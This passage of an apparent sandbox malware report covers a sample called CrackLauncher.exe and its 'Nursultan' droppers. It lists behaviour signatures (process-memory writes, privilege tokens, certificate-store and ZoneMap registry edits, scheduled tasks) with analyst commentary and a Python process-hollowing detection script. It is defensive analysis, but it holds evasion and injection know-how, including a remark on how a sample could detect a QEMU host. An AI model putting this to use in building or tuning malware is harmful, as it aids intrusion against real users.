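        if not m:
            continue
        cols = COL_SPLIT.split(m["rest"])           # [indicator, process?, target?]
        cols = [None if c == "N/A" else c for c in cols] + [None, None]
        events.append(ContextWrite(int(m["src"]), int(m["dst"]), cols[1], cols[2]))
    return events


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def targets_by_image(events: List[ContextWrite]) -> Counter:
    """How often each target image had its thread context rewritten."""
    return Counter(basename(e.dst_image) for e in events if e.dst_image)


def hollowing_candidates(events: List[ContextWrite]) -> List[ContextWrite]:
    """Writes from an image in a user-writable directory into a system binary."""
    return [e for e in events
            if e.src_image and e.dst_image
            and any(p in e.src_image.lower() for p in USER_WRITABLE)
            and basename(e.dst_image) in LOLBIN_TARGETS]


def pids_seen_as_both(events: List[ContextWrite]) -> set:
    """PIDs that are a target in one row and a source in another: either a hollowed
    process going on to hollow others, or PID reuse in a long detonation."""
    return {e.dst_pid for e in events} & {e.src_pid for e in events}


if __name__ == "__main__":
    evs = parse_rows(SAMPLE_ROWS)
    print("targets:", dict(targets_by_image(evs)))
    for e in hollowing_candidates(evs):
        print(f"{e.src_pid} ({basename(e.src_image)}) -> {e.dst_pid} ({basename(e.dst_image)})")
    print("both source and target:", sorted(pids_seen_as_both(evs)))
```

Run over the full table, the target counter gives the MSBuild.exe dominance at a glance, and the source/target intersection is the list of PIDs to cross-check against the Processes section for reuse before drawing a chain from them.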

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rescache\_merged\1601268389\715946058.pri C:\Windows\system32\taskmgr.exe N/A
File created C:\Windows\rescache\_merged\4183903823\2290032291.pri C:\Windows\system32\taskmgr.exe N/A

Both rows are Task Manager's own merged resource cache (rescache\_merged\*.pri) written by taskmgr.exe when it starts; they are background noise from the detonation, not files dropped by the sample.

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
(64 events collapsed: 6 attributed to C:\Windows\system32\sc.exe, 58 with no process recorded.)

These launches pair with the "Stops running service(s)" and "Creates new service(s)" signatures in the summary. The arguments are not recorded here, so which services were stopped and what service was created must be taken from the Command Line and Processes sections.

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

The process recorded for all three rows is taskmgr.exe, which reads disk FriendlyName values as part of its normal Performance view, so this is not evidence of an anti-VM check by the payload itself. The Ven_QEMU string does reveal that the detonation host is a QEMU/KVM guest; a sample that did query this key could use it to abort.

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier N/A N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A N/A N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A
(64 events collapsed: 9 attributed to C:\Windows\System32\Wbem\wmic.exe, 55 with no process recorded.)

Querying the video controller through WMI is how miner droppers decide whether a GPU is worth mining on and how stealers fill the hardware section of their victim report. The query text is not reproduced in this table; see the Command Line section.

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs N/A N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs N/A N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates N/A N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 N/A N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs N/A N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" N/A N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates N/A N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" N/A N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates N/A N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" N/A N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 N/A N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings C:\Windows\system32\taskmgr.exe N/A
Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings N/A N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
(64 rows in the original table: 7 name this process, the other 57 carry no recoverable fields, every column being N/A)

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 (LUID 33, SeIncreaseWorkingSetPrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 (LUID 34, SeTimeZonePrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 (LUID 35, SeCreateSymbolicLinkPrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 (LUID 36, SeDelegateSessionUserImpersonatePrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 (LUID 33, SeIncreaseWorkingSetPrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 (LUID 34, SeTimeZonePrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 (LUID 35, SeCreateSymbolicLinkPrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 (LUID 36, SeDelegateSessionUserImpersonatePrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 (LUID 33, SeIncreaseWorkingSetPrivilege) N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
(64 identical rows in the original table, all for this process; 63 repeats collapsed)

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
(64 identical rows in the original table, all for this process; 63 repeats collapsed)

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5084 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5084 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5084 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
PID 5084 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
PID 5084 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5084 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5084 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
PID 5084 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
PID 5084 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5084 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4640 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\SYSTEM32\attrib.exe
PID 4640 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\SYSTEM32\attrib.exe
PID 4640 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
